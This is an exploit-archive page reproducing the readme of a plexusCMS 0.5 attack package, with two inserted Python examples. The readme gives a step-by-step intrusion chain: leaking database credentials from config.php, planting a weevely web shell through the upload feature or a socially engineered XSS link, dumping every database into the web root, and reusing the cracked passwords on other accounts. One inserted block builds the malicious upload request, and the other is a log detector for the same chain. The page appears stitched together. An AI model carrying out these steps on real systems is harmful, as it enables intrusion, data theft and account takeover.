plexusCMS 0.5 – Cross-Site Scripting / Remote Shell / Credentials Leak

  • Author: neglomaniac
    Date: 2014-03-31
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/32618/
  • # Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit
    # Google Dork: allinurl: plx-storage
    # Date: 22.02.2013
    # Exploit Author: neglomaniac
    # Vendor Homepage: http://plexus-cms.org/
    # Version: 0.5
    
    ---
    
    FILES
    
    backdoor.php	simple command execution backdoor
    commands.txt	list of useful commands for taking over the remote box
    generator.py	creates the important files with the given parameters
    phpinfo.php	simple phpinfo call for testing
    plexus05.tgz	original plexus source code for auditing
    postit.py	sends the evil POST request for the file upload
    readme.txt	nothing else than this file
    request.txt	evil POST request template for postit.py
    weevely.php	weevely shell with password: secret
    weevely.tgz	weevely stealth web backdoor client and generator
    
    ---
    
    EXPLOITATION
    
    Get the database credentials. The configuration file can be fetched
    without authentication:
    
    wget http://RHOST/plx-file/config.php
    
    Try to log in to phpMyAdmin with them and dump the database for password
    cracking. If you can crack a password you can log in and upload PHP files
    through "new image" and "new file". Your PHP backdoors are then reachable,
    and executed, under http://plexushost/plx-storage/files/ or
    plx-storage/images/
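What the file upload amounts to on the wire, whether it is sent by hand with a cracked login or replayed by postit.py from request.txt, and the server-side check that would have stopped it. This is an added example for this page, not code from the plexusCMS exploit package or from plexusCMS itself; the upload handler path, the form field name and the session cookie are assumptions (the real ones live in request.txt, which the page does not reproduce), and only the plx-storage/files/ location comes from the text.

```python
"""Raw multipart upload of a PHP file into plx-storage, and the check that stops it.

Added example, not code from the plexusCMS exploit package or from plexusCMS.
ASSUMED_UPLOAD_PATH, ASSUMED_FIELD_NAME and the cookie are assumptions.
"""
import email
import secrets
from email import policy

ASSUMED_UPLOAD_PATH = "/plx-file/newfile.php"  # assumption: the authenticated "new file" handler
ASSUMED_FIELD_NAME = "userfile"                 # assumption: the upload form field
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def build_upload_request(filename, payload, session_cookie, host="victimhost", boundary=""):
    """Return a complete HTTP/1.1 POST (request line, headers, multipart body) as bytes.

    This is the request an attacker replays with a valid admin session: the
    filename and the declared Content-Type are both chosen by the sender.
    """
    boundary = boundary or "----plx" + secrets.token_hex(8)
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{ASSUMED_FIELD_NAME}"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n"        # lies about the type; a naive check trusts it
        "\r\n"
    ).encode() + payload + f"\r\n--{boundary}--\r\n".encode()
    head = (
        f"POST {ASSUMED_UPLOAD_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {session_cookie}\r\n"       # assumption: the victim's session cookie
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    ).encode()
    return head + body


def parse_upload_request(raw):
    """Parse the request the way the server sees it and report the uploaded part."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode().split("\r\n")
    headers = dict(line.split(": ", 1) for line in header_lines)
    # Reuse the stdlib MIME parser: feed it just the Content-Type header plus the body.
    msg = email.message_from_bytes(
        f"Content-Type: {headers['Content-Type']}\r\n\r\n".encode() + body,
        policy=policy.default,
    )
    part = next(msg.iter_parts())
    return {
        "path": request_line.split()[1],
        "field": part.get_param("name", header="content-disposition"),
        "filename": part.get_filename(),
        "declared_type": part.get_content_type(),
        "content": part.get_payload(decode=True),
    }


def should_reject(upload):
    """The check the vulnerable flow lacks: decide by the extension that will be
    stored under plx-storage/ and by the bytes themselves, never by the
    sender-declared Content-Type."""
    name = (upload["filename"] or "").lower()
    ext = "." + name.rsplit(".", 1)[1] if "." in name else ""
    looks_like_php = upload["content"].lstrip().startswith(b"<?")
    return ext not in ALLOWED_EXTENSIONS or looks_like_php


if __name__ == "__main__":
    req = build_upload_request("weevely.php", b"<?php echo 'owned'; ?>", "PHPSESSID=deadbeef")
    info = parse_upload_request(req)
    print(info["filename"], info["declared_type"], "reject:", should_reject(info))
```

The declared image/jpeg type is exactly what a check on the MIME header would accept; the stored name weevely.php is what the web server later executes, which is why the rejection logic keys on the extension and the leading bytes instead.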
    
    If you cannot get at the database, you can still get a file uploaded with
    XSS and social engineering: the generated JavaScript performs the upload
    from inside a logged-in user's browser session.
    
    Set up a server with PHP support and Python installed on it. Copy all of
    these files to a location you can write to. Launch:
    
    python generator.py plexushost 80 http://yourserver/scripts/ weevely.php
    
    If you see "plximage.php, plximage.js, plximage.xss generated!!!" all
    files needed for exploitation have been generated.
    
    plexushost is the victim webserver where plexus is installed
    80 is the webserver port the victim listens on
    
    http://yourserver/scripts/ is the location of the exploit files. Do not
    forget the trailing slash!!!
    
    weevely.php is the file that gets uploaded to http://victimhost/plx-storage/files/
    
    Take the URL from plximage.xss, obfuscate it, wrap it in an iframe and/or
    shorten it, and put it into an email, on a web page or wherever you want.
    
    Social-engineer your victim into opening this URL. If the victim is logged
    in, your backdoor appears at http://victimhost/plx-storage/files/. Otherwise
    you need to social-engineer the victim into logging in; once they do, the
    backdoor lands in the files directory.
    
    Connect to your backdoor with weevely and your password (secret):
    python weevely.py http://victimhost/plx-storage/files/yourfile.php secret
    
    Dump the whole database through the shell with the previously collected
    credentials and download it. Run mysqldump from the plx-storage/files/
    directory so that the dump is reachable over the web:
    mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases
    wget http://RHOST/plx-storage/files/plxinfo.txt
    
    Crack the passwords and reuse them in your next attempts against the
    victim: try them for root and other system users, other MySQL databases,
    the MySQL root account, Facebook/Twitter accounts and so on.
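Seen from the defender's side, every step of the chain above leaves a trace in the web server log: the direct fetch of plx-file/config.php, PHP being requested (and executed) from plx-storage/files/ or plx-storage/images/, weevely polling its shell, and the dump pulled back out of files/. The following is an added example for this page, not part of the exploit package; it runs those indicators over Apache combined-format log lines that are constructed for the example, with the paths taken from the text above.

```python
"""Flag the plexusCMS 0.5 abuse chain in an Apache combined access log.

Added example for this page, not part of the exploit package. Indicators:
config.php fetched directly, PHP served from the plx-storage upload
directories, repeated hits on one such file, a dump pulled from files/.
SAMPLE_LOG is constructed for this example.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Anything PHP can be talked into executing, inside the two upload directories.
STORAGE_PHP_RE = re.compile(r"^/plx-storage/(files|images)/.*\.(php\d?|phtml|phar)$", re.I)
DUMP_EXTENSIONS = (".txt", ".sql", ".gz", ".zip")
SHELL_HIT_THRESHOLD = 3

SAMPLE_LOG = """\
203.0.113.7 - - [22/Feb/2013:10:01:12 +0100] "GET /plx-file/config.php HTTP/1.1" 200 812 "-" "Wget/1.13.4"
198.51.100.23 - - [22/Feb/2013:10:05:03 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [22/Feb/2013:10:05:40 +0100] "GET /plx-storage/images/logo.png HTTP/1.1" 200 2048 "http://victimhost/" "Mozilla/5.0"
203.0.113.7 - - [22/Feb/2013:10:09:31 +0100] "POST /plx-storage/files/weevely.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Feb/2013:10:09:33 +0100] "POST /plx-storage/files/weevely.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Feb/2013:10:09:35 +0100] "POST /plx-storage/files/weevely.php HTTP/1.1" 200 1190 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Feb/2013:10:12:00 +0100] "GET /plx-storage/files/plxinfo.txt HTTP/1.1" 200 384211 "-" "Wget/1.13.4"
""".splitlines()


def parse_line(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines):
    """Return a list of (indicator, client_ip, path) tuples."""
    findings = []
    shell_hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        ok = rec["status"] == "200"
        # 1. config.php fetched directly. A 200 alone does not prove the source
        #    was served (executed PHP that prints nothing also returns 200); a
        #    body of several hundred bytes, as here, suggests it was.
        if ok and path.lower().endswith("/plx-file/config.php"):
            findings.append(("config_leak", rec["ip"], path))
        # 2. PHP executed from the upload directories, which should only ever
        #    hold static files.
        if ok and STORAGE_PHP_RE.match(path):
            findings.append(("php_in_storage", rec["ip"], path))
            shell_hits[(rec["ip"], path)] += 1
        # 3. A dump or archive pulled from files/ (the mysqldump step above).
        if ok and path.startswith("/plx-storage/files/") and path.lower().endswith(DUMP_EXTENSIONS):
            findings.append(("dump_download", rec["ip"], path))
    # 4. The same client hammering one PHP file in storage is a shell session.
    for (ip, path), n in shell_hits.items():
        if n >= SHELL_HIT_THRESHOLD:
            findings.append(("webshell_activity", ip, path))
    return findings


def summarize(findings):
    """Count findings per indicator, e.g. {'config_leak': 1, ...}."""
    return dict(Counter(kind for kind, _, _ in findings))


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

The second indicator is the one worth alerting on regardless of this exploit: nothing legitimate ever requests a .php file from an upload directory, so denying PHP execution there (or alerting on any such 200) covers every variant of the upload step, not only weevely.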
    
    ---
    
    
    Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32618.tgz